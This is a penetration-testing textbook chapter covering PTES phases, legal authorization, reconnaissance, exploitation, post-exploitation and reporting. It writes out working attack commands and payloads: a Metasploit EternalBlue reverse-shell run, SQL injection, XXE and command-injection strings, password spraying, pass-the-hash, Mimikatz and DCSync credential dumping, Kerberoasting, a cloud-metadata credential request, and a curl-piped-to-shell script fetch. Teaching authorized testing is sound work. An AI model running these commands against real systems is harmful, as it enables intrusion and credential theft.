Chapter 16: Penetration Testing Methodology¶
Overview¶
Penetration testing is the authorized simulation of real-world attacks to identify exploitable weaknesses before adversaries do. A structured methodology separates a professional engagement from ad hoc scanning — it determines scope, governs execution, and produces findings that drive measurable risk reduction. This chapter covers every phase of a penetration test from pre-engagement to reporting, at OSCP/PNPT practitioner level.
Learning Objectives
- Apply PTES, OWASP Testing Guide, and NIST SP 800-115 to scope and execute engagements
- Execute systematic reconnaissance, scanning, exploitation, and post-exploitation phases
- Perform specialized testing against web applications, Active Directory, APIs, and cloud environments
- Document findings to the standard expected by executive and technical audiences
- Navigate the legal and contractual framework that authorizes testing
- Select appropriate tools for each phase of the engagement lifecycle
Prerequisites: Chapters 1–4 (telemetry, logging, detection). Familiarity with TCP/IP, Linux, Windows, and basic scripting.
Curiosity Hook¶
The Unlocked Back Door
A regional bank engaged a penetration testing firm to assess their internet perimeter. The testers found nothing critical on the external scope — well-patched, well-segmented. But during passive OSINT, an analyst noticed the bank's IT vendor had a public GitHub repository containing a Terraform module with hardcoded credentials. Twenty minutes later, the tester was authenticated to the bank's AWS management account as an admin.
No firewall was bypassed. No vulnerability was exploited. A third-party contractor's public repository contained the keys to the kingdom. The bank had no visibility into vendor code repositories. The engagement report recommended supplier security clauses, external attack surface monitoring, and quarterly AWS IAM reviews. Total cost of the engagement: $18,000. Estimated cost of the breach it prevented: north of $50M.
Standards and Frameworks¶
Multiple standards govern professional penetration testing. Engagements SHOULD reference at least one standard to establish methodology credibility and ensure completeness.
| Framework | Owner | Focus | Best Used For |
|---|---|---|---|
| PTES (Penetration Testing Execution Standard) | Community | Full lifecycle, 7 phases | General network/app engagements |
| OWASP Testing Guide v4.2 | OWASP | Web application testing | Web app and API engagements |
| NIST SP 800-115 | NIST | Technical security testing | Federal/regulated environments |
| OSSTMM 3.0 | ISECOM | Operational security testing | Quantitative risk measurement |
| TIBER-EU | ECB | Threat-intelligence-based red teaming | Financial sector, regulators |
| CBEST | Bank of England | Intelligence-led testing | UK financial firms |
PTES — 7 Phases¶
flowchart LR
A[Pre-Engagement\nInteractions] --> B[Intelligence\nGathering]
B --> C[Threat Modeling]
C --> D[Vulnerability\nAnalysis]
D --> E[Exploitation]
E --> F[Post\nExploitation]
F --> G[Reporting]
style A fill:#1e3a5f,color:#e6edf3
style G fill:#1a3a1a,color:#e6edf3Phase 1 — Pre-Engagement¶
The pre-engagement phase establishes legal authorization, defines scope, and sets expectations. It is the most critical phase — proceeding without clear authorization violates the Computer Fraud and Abuse Act (18 U.S.C. § 1030) in the US and the Computer Misuse Act 1990 in the UK.
Legal Documents Required¶
- Master Service Agreement (MSA): overarching legal relationship between firm and client
- Statement of Work (SOW): specific engagement scope, deliverables, timeline, cost
- Rules of Engagement (RoE): operational parameters — what is in/out of scope, testing hours, kill-switch contacts
- Permission to Test letter: explicit written authorization from the asset owner, not just the client contact
Scoping Checklist¶
A well-scoped engagement prevents both scope creep and dangerous surprises. The scoping document SHALL include:
- IP ranges and CIDR blocks in scope (and explicitly excluded)
- Domain names and subdomains in scope
- Cloud account IDs (AWS, Azure, GCP) in scope
- Applications explicitly in scope (with version and URL)
- Physical locations in scope (for physical assessments)
- Out-of-scope systems (production databases, third-party SaaS, critical infrastructure)
- Testing window: dates, times, time zones
- Emergency contacts: client security lead, NOC, legal counsel
- Kill-switch procedure: who to call and how if something breaks
Legal Framework Reference¶
| Jurisdiction | Relevant Law | Key Provision |
|---|---|---|
| United States | CFAA (18 U.S.C. § 1030) | Unauthorized access to computers is a federal felony |
| United States | ECPA | Wire and electronic communications interception |
| United Kingdom | Computer Misuse Act 1990 | Unauthorized access, modification, impairment |
| European Union | Directive 2013/40/EU | Criminal offenses for computer intrusion |
| Australia | Criminal Code Act 1995 | Unauthorized computer access |
Third-Party Authorization
Testing cloud infrastructure REQUIRES authorization from the cloud provider, not just the client. AWS, Azure, and GCP all have penetration testing policies. Violating these terms can result in account suspension even with client authorization.
Phase 2 — Reconnaissance¶
Passive Reconnaissance¶
Passive recon collects publicly available information without touching target systems. Detection risk is zero.
WHOIS and DNS:
# WHOIS lookup
whois example.com
# Passive DNS history
# Tools: SecurityTrails, PassiveTotal, ViewDNS.info
# DNS enumeration — zone transfer attempt
dig axfr @ns1.example.com example.com
# Subdomain enumeration (passive)
amass enum -passive -d example.com -o subdomains.txt
# Certificate transparency logs
curl -s "https://crt.sh/?q=%25.example.com&output=json" | jq '.[].name_value' | sort -u
Internet-Wide Scanning (OSINT):
# Shodan — find all hosts for an organization
shodan search "org:\"Example Corp\"" --fields ip_str,port,org,hostnames
# Find exposed admin panels
shodan search "http.title:\"admin\" org:\"Example Corp\""
# Censys — TLS certificate search
# Search: parsed.names: example.com
Google Dorking:
site:example.com filetype:pdf # Published documents
site:example.com inurl:admin # Admin interfaces
site:example.com "index of" "password" # Exposed directories
site:example.com ext:conf OR ext:env # Config files
"@example.com" filetype:xls # Spreadsheets with email addresses
site:github.com "example.com" password # Leaked credentials on GitHub
Email and Personnel Intel:
# theHarvester — emails, subdomains, IPs
theHarvester -d example.com -b google,bing,linkedin,shodan -l 500
# Hunter.io (API) — find email format
curl "https://api.hunter.io/v2/domain-search?domain=example.com&api_key=KEY"
# GitHub — search for secrets in public repos
# Search: "example.com" "password" OR "secret" OR "api_key"
# Tools: truffleHog, gitleaks on discovered repos
Active Reconnaissance¶
Active recon touches target systems. Hosts MAY detect it. SHALL only begin after written authorization is confirmed.
# Host discovery
nmap -sn 192.168.1.0/24 -oG hosts-up.txt
# Full port scan (all 65535 ports)
nmap -p- --min-rate 5000 -oA full-scan 192.168.1.10
# Service version detection + OS detection
nmap -sV -sC -O -p 22,80,443,8080 192.168.1.10 -oA svc-scan
# UDP scan (top 100 ports)
nmap -sU --top-ports 100 192.168.1.10
# Aggressive scan (not stealthy)
nmap -A -p- 192.168.1.10
Phase 3 — Scanning and Enumeration¶
Vulnerability Scanning¶
# Nessus CLI (if available)
nessuscli scan --name "Engagement Scan" --policy "Advanced Scan" --targets targets.txt
# OpenVAS (open-source alternative)
omp -u admin -w password -C -c "Full and fast" -t 192.168.1.0/24
# Nikto — web server scanning
nikto -h https://example.com -output nikto-results.txt -Format txt
Web Enumeration¶
# Directory/file brute force
gobuster dir -u https://example.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
-x php,txt,html,bak -o gobuster-results.txt
# ffuf — fast fuzzing with filter
ffuf -u https://example.com/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt \
-fc 404 -o ffuf-results.json
# Parameter discovery
ffuf -u "https://example.com/api?FUZZ=test" -w /usr/share/wordlists/SecLists/Discovery/Web-Content/burp-parameter-names.txt
Service-Specific Enumeration¶
# SMB enumeration
enum4linux-ng -A 192.168.1.10 | tee enum4linux-output.txt
smbclient -L //192.168.1.10 -N
smbmap -H 192.168.1.10
# LDAP enumeration (Active Directory)
ldapsearch -x -H ldap://192.168.1.10 -b "DC=example,DC=com" -s sub "(objectClass=*)"
# SMTP user enumeration
smtp-user-enum -M VRFY -U /usr/share/wordlists/SecLists/Usernames/Names/names.txt -t 192.168.1.25
# SNMP enumeration
snmpwalk -c public -v 2c 192.168.1.1
onesixtyone -c /usr/share/wordlists/SecLists/Discovery/SNMP/snmp.txt 192.168.1.1
Phase 4 — Exploitation¶
Metasploit Framework¶
# Launch Metasploit
msfconsole
# Search for exploits
search eternalblue
search type:exploit platform:windows
# Use a module
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 192.168.1.10
set LHOST 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run
# Meterpreter commands after shell
sysinfo # System information
getuid # Current user
getsystem # Attempt privilege escalation
hashdump # Dump NTLM hashes
run post/multi/recon/local_exploit_suggester
Web Application Exploitation¶
SQL Injection:
# sqlmap — automated SQL injection
sqlmap -u "https://example.com/product?id=1" --dbs --batch
sqlmap -u "https://example.com/login" --data "user=admin&pass=test" --level=5 --risk=3 --dump
# Manual SQLi test
' OR '1'='1
' UNION SELECT null,null,null--
' AND 1=CONVERT(int,(SELECT TOP 1 name FROM sysobjects WHERE xtype='U'))--
Common Web Vulnerabilities:
# XXE (XML External Entity)
# Payload in XML body:
# <?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
# SSRF — test internal access
curl "https://example.com/api/fetch?url=http://169.254.169.254/latest/meta-data/"
# Command injection
; id
| id
`id`
$(id)
# SSTI (Server-Side Template Injection)
{{7*7}} # Returns 49 — Jinja2/Twig
${7*7} # Returns 49 — FreeMarker
<%= 7*7 %> # Returns 49 — ERB
Password Attacks¶
# Hashcat — GPU cracking
hashcat -m 1000 ntlm-hashes.txt /usr/share/wordlists/rockyou.txt # NTLM
hashcat -m 1800 shadow-hashes.txt /usr/share/wordlists/rockyou.txt --rules-file /usr/share/hashcat/rules/best64.rule
hashcat -m 13100 kerberoast-hashes.txt /usr/share/wordlists/rockyou.txt # TGS/Kerberoast
# Password spraying
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Winter2025!' --continue-on-success
kerbrute passwordspray -d example.com --dc 192.168.1.1 users.txt 'Welcome1'
Phase 5 — Post-Exploitation¶
Privilege Escalation¶
Windows:
# Check current privileges
whoami /priv
whoami /groups
# Run WinPEAS (privilege escalation enumeration)
.\winPEASany.exe
# AlwaysInstallElevated check
reg query HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\"
# Token impersonation with Meterpreter
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM"
Linux:
# Run LinPEAS
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
# SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Sudo rights
sudo -l
# Cron jobs running as root
cat /etc/crontab
ls -la /etc/cron.*
Lateral Movement¶
# Pass-the-Hash
crackmapexec smb 192.168.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c'
# PsExec via Impacket
impacket-psexec example.com/administrator:password@192.168.1.10
# WMI execution
impacket-wmiexec example.com/administrator:password@192.168.1.10
# PTT (Pass-the-Ticket) with Rubeus
Rubeus.exe asktgt /user:administrator /rc4:HASH /ptt
Rubeus.exe kerberoast /outfile:kerberoast.hashes
# SecretsDump — remote NTLM hash dump
impacket-secretsdump example.com/administrator:password@192.168.1.10
Credential Dumping¶
# Mimikatz
privilege::debug
sekurlsa::logonpasswords # Dump plaintext creds from LSASS
lsadump::sam # SAM database
lsadump::dcsync /domain:example.com /user:Administrator # DCSync
# Remote LSASS dump (stealthier)
impacket-secretsdump -just-dc-user krbtgt example.com/administrator:password@192.168.1.1
Phase 6 — Specialized Testing Areas¶
Active Directory¶
# BloodHound data collection
.\SharpHound.exe -c All --zipfilename bloodhound-data.zip
# Import to BloodHound, then query:
# "Find Shortest Paths to Domain Admins"
# "Find Kerberoastable Users"
# "Find AS-REP Roastable Users"
# "Shortest Paths to Unconstrained Delegation Systems"
# Kerberoasting
impacket-GetUserSPNs -request -dc-ip 192.168.1.1 example.com/jdoe:password -outputfile kerberoast.hashes
# AS-REP Roasting (no preauth required)
impacket-GetNPUsers -dc-ip 192.168.1.1 -no-pass -usersfile users.txt example.com/
Web Application (OWASP Top 10)¶
| Vulnerability | Test Technique | Tool |
|---|---|---|
| Broken Access Control | IDOR: change ID param in requests | Burp Suite Repeater |
| Cryptographic Failures | Check TLS version, cipher suites | testssl.sh, sslyze |
| Injection (SQLi) | ' OR 1=1-- in all inputs | sqlmap, Burp Suite |
| SSRF | Test URL params pointing inward | Burp Collaborator |
| XXE | Inject DOCTYPE with external entity | Burp Suite |
| Deserialization | Intercept serialized objects | ysoserial, PHPGGC |
| Security Misconfiguration | Directory listing, default creds | Nikto, manual |
| XSS | <script>alert(1)</script> variants | Dalfox, XSStrike |
Cloud Penetration Testing¶
# AWS — check for metadata SSRF
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Enumerate AWS with Pacu (after getting creds)
python3 pacu.py
Pacu > import_keys
Pacu > run iam__enum_permissions
Pacu > run iam__privesc_scan
# Check for overly permissive S3
aws s3 ls s3://target-bucket --no-sign-request # Unauthenticated
aws s3 ls s3://target-bucket # Authenticated
Phase 7 — Reporting¶
A penetration test is only as valuable as its report. Technical findings without actionable remediation guidance are wasted effort.
Report Structure¶
1. Executive Summary (1-2 pages)
- Engagement objective and scope
- Overall risk posture (Critical/High/Medium/Low counts)
- Most significant findings in plain language
- Top 3 remediation priorities
2. Methodology
- Standards followed (PTES, OWASP)
- Testing phases and techniques used
- Tools used
3. Technical Findings (one section per finding)
- Title
- Risk Rating: Critical / High / Medium / Low / Informational
- CVSS v3.1 Score
- Description
- Evidence (screenshots, command output)
- Business Impact
- Remediation Recommendation
- References (CVE, CWE, OWASP)
4. Remediation Roadmap
- Prioritized by risk
- Estimated effort
- Quick wins vs. strategic improvements
5. Appendices
- Scope confirmation
- Tool versions
- Raw scan output
Sample Finding Template¶
Finding: Kerberoastable Service Account with Weak Password
Title: Service Account Password Cracked via Kerberoasting
Risk Rating: Critical | CVSS v3.1: 9.0 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Description: The service account svc_backup has a Service Principal Name (SPN) registered, making it susceptible to Kerberoasting. An attacker with any domain user account can request a Kerberos service ticket encrypted with the account's NTLM hash, extract it offline, and crack it. The account uses a password from the rockyou.txt wordlist (Backup2019!) that was cracked in under 4 minutes.
Evidence: hashcat -m 13100 kerberoast.hashes rockyou.txt → cracked in 3m 47s
Business Impact: svc_backup has local administrator rights on 47 servers. A threat actor could leverage this for full domain compromise via lateral movement.
Remediation: 1. Change svc_backup password to a 25+ character random string 2. Migrate to a Group Managed Service Account (gMSA) — password rotates automatically 3. Audit all service accounts with SPNs: Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName 4. Implement Kerberoasting detection (Event ID 4769 with EncryptionType 0x17)
Common Failure Modes¶
| Failure | Consequence | Prevention |
|---|---|---|
| Inadequate scope documentation | Testing prohibited systems, legal liability | Detailed RoE with explicit exclusions |
| No kill-switch agreement | Crashing production systems with no escalation path | Define emergency contacts in writing |
| Testing without change management | Blocked by change management post-engagement | Involve change management in pre-engagement |
| Missing cloud provider authorization | Account suspension, legal action | Check CSP's pentest policy before testing |
| Incomplete cleanup | Test artifacts remain (backdoors, tools) | Cleanup checklist in SOW, confirmed by client |
| Overly technical report | Executives ignore findings | Always include executive summary and business impact |
| Scope creep | Testing unauthorized systems | Strict change control for scope modifications |
Exam Prep & Certifications¶
Relevant Certifications
The topics in this chapter align with the following certifications:
- OSCP — Domains: Penetration Testing Methodology, Exploitation, Post-Exploitation
- GIAC GPEN — Domains: Penetration Testing, Exploitation, Scanning
- CompTIA PenTest+ — Domains: Planning, Information Gathering, Attacks, Reporting
Benchmark Controls Tested¶
| Nexus SecOps Control | Control Description | Related Findings |
|---|---|---|
| Nexus SecOps-D-047 | External attack surface monitoring | OSINT phase findings |
| Nexus SecOps-D-048 | Vulnerability management SLA compliance | Unpatched CVEs exploited |
| Nexus SecOps-D-052 | Privileged account access controls | Kerberoasting, Pass-the-Hash |
| Nexus SecOps-D-061 | Cloud IAM least-privilege | AWS/Azure privilege escalation |
| Nexus SecOps-D-073 | Web application security testing | OWASP Top 10 findings |
Key Terms¶
| Term | Definition |
|---|---|
| Rules of Engagement (RoE) | Operational parameters governing what testers may and may not do |
| Scope | The defined set of systems, networks, and applications authorized for testing |
| PTES | Penetration Testing Execution Standard — 7-phase methodology |
| Kerberoasting | Offline cracking of Kerberos service tickets to recover service account passwords |
| Pass-the-Hash | Using a captured NTLM hash to authenticate without knowing the plaintext password |
| Post-exploitation | Activities performed after gaining initial access: persistence, lateral movement, exfiltration |
| Pivot | Using a compromised host as a relay to reach otherwise inaccessible network segments |
| BloodHound | Graph-based tool for visualizing Active Directory attack paths |
| CVSS | Common Vulnerability Scoring System — standardized vulnerability severity scoring |
| DCSync | Technique to extract NTLM hashes from a domain controller by impersonating a replication partner |